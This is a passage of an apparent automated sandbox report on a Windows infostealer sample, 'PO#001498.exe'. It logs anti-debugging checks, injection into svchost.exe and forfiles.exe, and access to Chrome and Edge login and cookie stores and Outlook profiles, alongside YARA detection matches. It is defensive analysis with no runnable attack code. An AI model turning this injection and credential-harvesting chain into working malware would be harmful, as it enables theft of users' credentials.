Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03856962 mov eax, dword ptr fs:[00000030h] 8_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03856962 mov eax, dword ptr fs:[00000030h] 8_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0387096E mov eax, dword ptr fs:[00000030h] 8_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0387096E mov edx, dword ptr fs:[00000030h] 8_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0387096E mov eax, dword ptr fs:[00000030h] 8_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D4978 mov eax, dword ptr fs:[00000030h] 8_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D4978 mov eax, dword ptr fs:[00000030h] 8_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038BC97C mov eax, dword ptr fs:[00000030h] 8_2_038BC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03830887 mov eax, dword ptr fs:[00000030h] 8_2_03830887
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038BC89D mov eax, dword ptr fs:[00000030h] 8_2_038BC89D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0385E8C0 mov eax, dword ptr fs:[00000030h] 8_2_0385E8C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_039008C0 mov eax, dword ptr fs:[00000030h] 8_2_039008C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FA8E4 mov eax, dword ptr fs:[00000030h] 8_2_038FA8E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386C8F9 mov eax, dword ptr fs:[00000030h] 8_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386C8F9 mov eax, dword ptr fs:[00000030h] 8_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038BC810 mov eax, dword ptr fs:[00000030h] 8_2_038BC810
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03852835 mov eax, dword ptr fs:[00000030h] 8_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03852835 mov eax, dword ptr fs:[00000030h] 8_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03852835 mov eax, dword ptr fs:[00000030h] 8_2_03852835
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_00426DA1
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0042202E SetUnhandledExceptionFilter, 0_2_0042202E
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004230F5
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417D93
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00421FA7

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtWriteVirtualMemory: Direct from: 0x77762E3C Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtMapViewOfSection: Direct from: 0x77762D1C Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtNotifyChangeKey: Direct from: 0x77763C2C Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtCreateMutant: Direct from: 0x777635CC Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtResumeThread: Direct from: 0x777636AC Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtProtectVirtualMemory: Direct from: 0x77757B2E Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtQuerySystemInformation: Direct from: 0x77762DFC Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtAllocateVirtualMemory: Direct from: 0x77762BFC Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtReadFile: Direct from: 0x77762ADC Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtDelayExecution: Direct from: 0x77762DDC Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtWriteVirtualMemory: Direct from: 0x7776490C Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtQueryInformationProcess: Direct from: 0x77762C26 Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtResumeThread: Direct from: 0x77762FBC Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtCreateUserProcess: Direct from: 0x7776371C Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtSetInformationThread: Direct from: 0x777563F9 Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtAllocateVirtualMemory: Direct from: 0x77763C9C Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtSetInformationThread: Direct from: 0x77762B4C Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtQueryAttributesFile: Direct from: 0x77762E6C Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtReadVirtualMemory: Direct from: 0x77762E8C Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtCreateKey: Direct from: 0x77762C6C Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtQuerySystemInformation: Direct from: 0x777648CC Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtAllocateVirtualMemory: Direct from: 0x777648EC Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtQueryVolumeInformationFile: Direct from: 0x77762F2C Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtOpenSection: Direct from: 0x77762E0C Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtDeviceIoControlFile: Direct from: 0x77762AEC Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtAllocateVirtualMemory: Direct from: 0x77762BEC Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtQueryInformationToken: Direct from: 0x77762CAC Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtTerminateThread: Direct from: 0x77762FCC Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtCreateFile: Direct from: 0x77762FEC Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtOpenFile: Direct from: 0x77762DCC Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtOpenKeyEx: Direct from: 0x77762B9C Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtSetInformationProcess: Direct from: 0x77762C5C Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe NtProtectVirtualMemory: Direct from: 0x77762F9C Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\forfiles.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: NULL target: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: NULL target: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Thread register set: target process: 4904 Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Thread APC queued: target process: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2C10008 Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0043916A LogonUserW, 0_2_0043916A
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D6D0
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004375B0
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event, 0_2_00436431
Source: C:\Users\user\Desktop\PO#001498.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO#001498.exe" Jump to behavior
Source: C:\Program Files (x86)\VFHYPMRHNSmDvkDOwyvQmIScReffGBDtnnCfHxSMLyuqFYcuFILGcMwFiYnGerwoQHpXzBGxx\AnbtBVreItY.exe Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\SysWOW64\forfiles.exe" Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00445DD3
Source: PO#001498.exe, AnbtBVreItY.exe, 0000000B.00000000.1698654132.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000B.00000002.3126933417.0000000001A01000.00000002.00000001.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3131925278.0000000001991000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: AnbtBVreItY.exe, 0000000B.00000000.1698654132.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000B.00000002.3126933417.0000000001A01000.00000002.00000001.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3131925278.0000000001991000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: AnbtBVreItY.exe, 0000000B.00000000.1698654132.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000B.00000002.3126933417.0000000001A01000.00000002.00000001.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3131925278.0000000001991000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: ?Program Manager
Source: PO#001498.exe Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: AnbtBVreItY.exe, 0000000B.00000000.1698654132.0000000001A00000.00000002.00000001.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000B.00000002.3126933417.0000000001A01000.00000002.00000001.00040000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3131925278.0000000001991000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00410D10 cpuid 0_2_00410D10
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_004223BC
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_004711D2 GetUserNameW, 0_2_004711D2
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 0_2_0042039F
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0040E470

Stealing of Sensitive Information

barindex
Source: Yara match File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.3133057378.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1776540328.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3132858119.0000000004920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1776852488.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3133096714.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3132094860.00000000044C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3120123793.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1777534454.0000000005050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: PO#001498.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: PO#001498.exe Binary or memory string: WIN_XP
Source: PO#001498.exe Binary or memory string: WIN_XPe
Source: PO#001498.exe Binary or memory string: WIN_VISTA
Source: PO#001498.exe Binary or memory string: WIN_7

Remote Access Functionality

barindex
Source: Yara match File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.3133057378.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1776540328.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3132858119.0000000004920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1776852488.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3133096714.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3132094860.00000000044C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3120123793.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1777534454.0000000005050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_004741BB
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket, 0_2_0046483C
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 0_2_0047AD92
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs